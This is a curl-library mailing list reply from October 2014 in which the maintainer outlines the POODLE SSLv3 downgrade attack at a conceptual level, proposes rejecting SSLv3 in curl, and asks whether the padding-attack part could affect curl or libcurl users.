cURL / Mailing Lists / curl-library / Single Mail

curl-library

Re: SSLv3 fallback attack POODLE

From: Daniel Stenberg <daniel_at_haxx.se>
Date: Thu, 16 Oct 2014 08:55:00 +0200 (CEST)

On Wed, 15 Oct 2014, Ray Satiro wrote:

> I read today of a new method to decrypt SSL called POODLE. If you haven't
> read of it you should. It works by using SSL fallback behavior to get SSLv3
> which can now be decrypted [1][2].

I won't belittle the attack, but I want us to take a step back and look at
what this attack is and does and then what we should do as good netizens to
make sure it is clean outside our door.

As I understand things (and please correct me on any errors I make), POODLE is
at least two things: A) a "downgrade dance" that makes the client switch down
to SSLv3 instead of using the more reliable TLS versions, combined with B) an
attack using a block cipher over this SSLv3 to expose/figure out (parts of)
the plain text.

A decent and simple remedy to all of this is to just reject and deny SSLv3
completely. That'll hurt some amount of legacy services and users. My guess is
that we probably already hurt those same users with our default cipher list
not including RC4. (I noticed libressl went ahead and disabled SSLv3 by
default.)

But the (B) part above requires an active attacker that can try a lot of
variations of the same request to see how they end up different, and in all
the cases I've seen so far it basically requires javascript in a browser.

Is there a case for (B) using curl or libcurl?

-- 
  / daniel.haxx.se
-------------------------------------------------------------------
List admin: http://cool.haxx.se/list/listinfo/curl-library
Etiquette:  http://curl.haxx.se/mail/etiquette.html
Received on 2014-10-16